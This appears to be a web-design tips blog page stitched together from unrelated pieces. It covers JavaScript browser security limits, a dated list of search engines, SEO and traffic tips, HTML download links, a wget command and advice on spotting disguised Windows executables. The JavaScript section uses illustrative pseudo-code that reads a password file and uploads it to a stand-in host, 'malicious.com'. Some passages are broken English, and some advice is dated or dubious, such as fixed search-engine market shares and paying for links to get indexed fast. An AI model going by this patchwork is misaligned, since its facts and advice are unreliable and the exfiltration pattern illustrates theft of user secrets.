Tryangled Solutions web designing tips tricks

Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site:
The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

1. JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard

filesystem.read(’/my/password/file’);
filesystem.write(’horridvirus.exe’);

2. JavaScript cannot execute any other programs. This would also be unacceptable

execute(’horridvirus.exe’)

3. JavaScript cannot establish any connection to whatever computer, except to download a new HTML page or to send mail. This, too, would create unacceptable hazards:

var security_hazard = connection.open(’malicious.com’);
security_hazard.upload(filesystem.read(’/my/password/file’));
security_hazard.upload(filesystem.read(’/ultra_secret/loans.xls’));

Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with its ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. It has some built–in protection, but hackers regularly find weaknesses. The first JavaScript virus I heard of works in such a way.

So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that’s not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

1. You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.
You can go back or forward in the browsing history, but you cannot find out which page you’ll go to.
2. You cannot do anything in pages that come from another server. So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you’ve opened in other browser windows. See the frame busting page for some more information.
3. You cannot set the value of a file upload field (<input type=”file”>).

document.forms[0].upload_field.value = ‘/my/password/file’;
document.forms[0].submit();

4. If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action.
However, this rule isn’t implemented in all browsers and is easy to work around in Explorer.
5. If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.
6. You should not be able to open a new window smaller than 100×100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window.
Note that Explorer on Windows (and maybe other browsers, too) does allow this, contrary to safety regulations.

Thus JavaScript is a scripting language for influencing HTML elements, like forms, images, layers, paragraphs and such, and for influencing a few non–HTML objects like the browser window. Nothing more, but (most importantly) nothing less.

* AOL Search - A Google powered search engine used by AOL users also pulls listings from the Open Directory Project.
* AltaVista - the Internet’s first Web Index, has very comprehensive coverage and a wide range of power searching commands, which make it a particular favorite among researchers. It gets its listings from Yahoo! Search.
* All The Web - uses results from Yahoo! Search plus an index of tens of millions of pdf and doc files.
* Ask.com - (formerly Ask Jeeves) is a human-powered search service that attempts to direct you to the exact page that answers your question. If it fails to find a match within its own database, then it will provide web pages from their search engine.
* Excite - A popular web portal (a page that, in addition to search, includes news, sports, weather, email and much more) on the web. Excite uses a metasearch engine that searches Google, Yahoo and Ask listings.
* Google - Currently the most popular search engine, makes heavy use of link popularity as a primary way to rank web sites. This can be especially helpful in finding good sites in response to general searches such as “cars” and “travel,” because users across the web have in essence voted for good sites by linking to them.
Google is also known for a wide range of features including: cached pages, excellent spell checking, access to dictionary definitions, stock quotes, street maps, telephone numbers and more. The Google Toolbar is also very popular.
* HotBot - has advanced search features and presents listings from either Ask.com or MSN and the Open Directory Project
* LookSmart includes past and popular searches right on their home page. They also have a pay per click advertising program.
* Lycos - another web portal offers “personalized content” including free email, websites, blogs and photo sharing. They include listings from the Open Directory Project. A good looking site.
* MSN Search - Microsoft’s MSN web portal also offers free email, instant messenger, and a directory. It previously used Looksmart for its search results but now provides access to Yahoo’s listings.
* Netscape Search - Netscape Search’s results come primarily from Google and the Open Directory Project.
* Open Directory Project - Uses volunteer editors to catalog the web. It was acquired by Netscape in November 1998, and the company pledged that anyone would be able to use information from the directory through an open license arrangement. Netscape itself was the first licensee. Lycos also uses the information for its main service and within Lycos-owned HotBot. Here’s more information about Open Directory.
* Search.com - A metasearch engine owned by CNET, that searches Google, Ask.com, LookSmart and dozens of other leading search engines to bring you the best results.
* Snap - An innovative search company that offers previews of websites in search listings.
* WebCrawler is a metasearch engine that combines results from Google, Yahoo! Search, MSN Search and Ask.com. They also offer a toolbar with Dictionary Search that you can download.
* Yahoo! Search - Once the web’s most popular search service is still a good alternative to Google. Yahoo is the oldest major web site directory, having launched in late 1994.

Instead of going to Google.com each time to search, it’s much faster to have Google built into your browser. Several options:

* My preferred browser for PC or Mac is Firefox <getfirefox.com>, which already has built-in Google. You should download the free Googlebar extension <googlebar.mozdev.org> or the official Google Toolbar <toolbar.google.com> (the Google Toolbar also works on PC Explorer). Faster searches; pop-up blocker; highlighting; word find (go directly to a word/phrase on a page). Be sure to get the Cool Iris extension for Firefox, which lets you preview Google results.

This the question of which the answers you might be searching for hours on the net and getting dissatisfied again and again.

As you might be knowing that of the total of the internet search, Google has a share of 50%, Yahoo of 30% and MSN of 20% leaving other search engines like Altavista, Yamour, etc.

So if you want to increase the popularity of your site, you must, at first, try to increase the Google Pagerank of your site which can be done only after you have got your site in Google’s Directory. And to do this you might fill the add url form provided by google. But don’t do that ‘cos it is not likely to help you!

To add your url you must get your link on other site which has got pagerank. Why, I’ll explain it now; Google searches or crawls to search the required result, it means for example the search word is “weight loss”, so Google would first search an site of that keyword from its directory then search links on that site on that keyword for further results. And you can get indexed in Google within 48hrs. If you ask a site with higher pagerank to put your link on his site for some amount of money.

That would probably an easy way to get your site indexed.

Then lets think of bringing traffic to your site. You can give your site to a PTC site which would give you visitors, but not true visitors. In the eyes of Google the less words your title has, the more weight you gain.

So to get a nice title for your site, I recommend you to download GoodKeywords from www.goodkeywords.com and do research on the main subject of your site. Then get a title with good popularity but less competitors.

If you have a file you would like to enable your visitors to download, most web servers will allow you to link directly to a download file.

<A HREF=”http://yourdomain.com/file.exe”>File</A>

If you have access to ftp, you can create a download link like this:

<A HREF=”ftp.yourdomain.com/file.zip”>File</A>

If you don’t have access to ftp, you can create a download link like this:

<A HREF=”http://yourdomain.com/file.zip”>File</A>

Instruct your visitors to hold the “shift” key down while they click on the download link.

Web site traffic is the number one imperative of 99-percent of the marketers on the Internet. How does one go about gaining more web site traffic? That is putting the cart before the horse. The first thing a person needs to do is measure current web site traffic before embarking on gaining more traffic. The second step is to use some or all of the methods listed below to gain more web site traffic and the third step is to measure current hits once again in order to calculate the success of the traffic-building campaign.

Measuring Web Site Traffic

You may know where you want to go, but how do you get there if you don’t know where you’re starting from? By measuring current web site traffic, you’ll establish a baseline of how many hits you’re currently receiving and where they’re coming from.

If someone else is hosting your site, most likely they’ll have a traffic analysis package that you can access through the control panel. Packages such as Webalizer or AW Stats are common. Even if one of these web site traffic analysis applications is not offered by your host, most likely you’ll still have access to the log files and can download these to a PC and use an application such as Funny Web Analyzer to give out the necessary stats.

If these web site traffic analysis packages are not available or understandable, you may wish to turn to an outside vendor who will give you a little Java code to put on the pages in order to give the necessary stats. Vendors like web-stats.com or freestats.com are a couple of places to start.

Once you have an idea of how many visitors per day you’re receiving and where they’re coming from it is time to start using some methods to gain web site traffic.

Gaining Web Site Traffic

The best method with the highest return on investment of gaining web site traffic is to perform search engine optimization (SEO) on a web site. Traffic from the natural search engines such as Google is free and for some online businesses, this accounts for 80-percent of their sales. Spending a couple of thousand dollars on search engine optimization may seem like a lot of money. But if your site has, say, 10 pages in the top rankings of the search engines (SE’s), do you think the resulting traffic will make this money back? If the answer is no, then you may not wish to do SEO. But if the answer is yes, which is most often the case, then you’ll not only recoup the investment but most likely gain thousands of dollars more in sales on your site. Isn’t this what you’re going for in the first place?

Since SEO is a slow, long-term plan for gaining web site traffic, typically taking months for the rankings to kick in, many web site owners choose to use a pay-per-click campaign to gain traffic in the short term. Pay-per-click programs such as Google AdWords and Yahoo / Overture Site Match are a way to see immediate results by placing a web site in the Sponsored Listings section of the SE’s search results page. Traffic from these campaigns can also help you judge the viability of the keywords you’ve chosen for the SEO campaign. When doing pay-per-click (PPC) you basically bid on a keyword or key-phrase. The more you pay, the higher you appear in the Sponsored Listings and the more traffic the web site will receive. The downside of pay-per-click, though is that you keep paying and paying and paying for the traffic. Soon you’ill spend way more on PPC than on the optimization services.

Press releases (PR’s) are another great way to generate web site traffic. In the recent Search Engine Strategies seminars it was pointed out that the major search engine news feeds actually scan online press releases to see what they are about and rank them accordingly. So, just when you thought you could get away with writing standard press releases, now you would do well to write optimized press releases. The major SE’s scan these press releases like they do an html page, looking for keywords in order to categorize and rank the release. If you have a timely story or happening about your site, write and submit an optimized press release on a place such as PRWeb.com and see your traffic grow. Or if you don’t wish to do your own, there is a new business called SEO-PR who will do this for you.

There are many other methods in gaining web site traffic - too many to fully cover here. But to name a few, it is worth check out: article writing, opt-in email advertising, newsletter advertising (your own and others), give-aways, contests and promotions and banner advertisement.

A good idea once you gain traffic is to employ a website monitoring service such as that from Webmetrics to monitor your site for downtime. Too much downtime may mean the robots are unable to spider your site and will adversely affect your rankings.

Search engine optimization is not an end all and be all for everyone when it comes to generating more web site traffic. Many different and varied online marketing practices should be employed. When employing these other practices, though, don’t neglect SEO because you can be sure your competition isn’t neglecting it.

wget –limit-rate=15k –random-wait -bd -i 1-2.txt
go in background limit download at 15KB/sec and load this download list: 1-2.txt (download location per line)

Windows makes it difficult to distinguish between data files and applications, and the same actions that open files (such as double-clicking) are also used for launching applications. A music file and a malicious application can look identical on common Windows setups. If you download files, whether through the Web, e-mail, or a peer-to-peer application, you should learn how to distinguish file types.

One way to determine the types of files is to use the “Details” view, which includes a column showing an English description of the file type — “Application”, “Text document”, and so on. To use this view, select “Details” from the “View” menu in Windows Explorer.

Another way to determine the type of a file is to look at the file’s extension. This method requires memorizing dozens of three-letter sequences, and has some other drawbacks, so I don’t recommend it. See this page about file extensions if you’re interested in using this method, or if you want to know why I don’t recommend it.

If you download 20 video clips from 10 porn sites, you’re unfortunately expected to check the type of each one before double-clicking on it. Hopefully, future versions of Firefox will do this for you (bug 249951).

Note that you cannot rely on a file’s icon to determine whether it is a program or a data file, because a program can have any icon in Windows. An attacker might choose a common “video file” icon as the icon for the program disguised as a data file.

When in doubt, drag the file to the correct application — for example, run Winamp, then drag the supposed audio file to Winamp. Alternatively, right-click the file and select a specific action, such as “Edit in Wordpad” or “Play in Winamp”. Beware of the verb “Open”, which can refer both to opening a document and launching an application.

By the way, any software you use to handle data from the web should be kept up-to-date. For example, if you download MP3s and play them in Winamp, be sure to keep Winamp up-to-date.

Any software you run can take over your user account, so it is important to be careful when downloading native software.

* Only install software from trustworthy sources.
* Get software from the official site, so you can be sure you’re getting the an untainted copy and to be sure you’re getting the latest version.
* When you are using an Internet connection you can’t trust, such as a random wireless access point, avoid downloading software at all. If you must download software, try to authenticate it in some way, such as by downloading it through https or checking the signing information for a Windows executable file. (Bug 292481 aims to make it easier for software developers to distribute software safely.)

(Hopefully, future operating systems will make it safe to download and install software by separating programs from each other and from your documents.)

Firefox 3 integrates elegantly with your antivirus software. When you download a file, your computer’s antivirus program automatically checks it to protect you against viruses and other malware, which could otherwise attack your computer. [available in Windows only]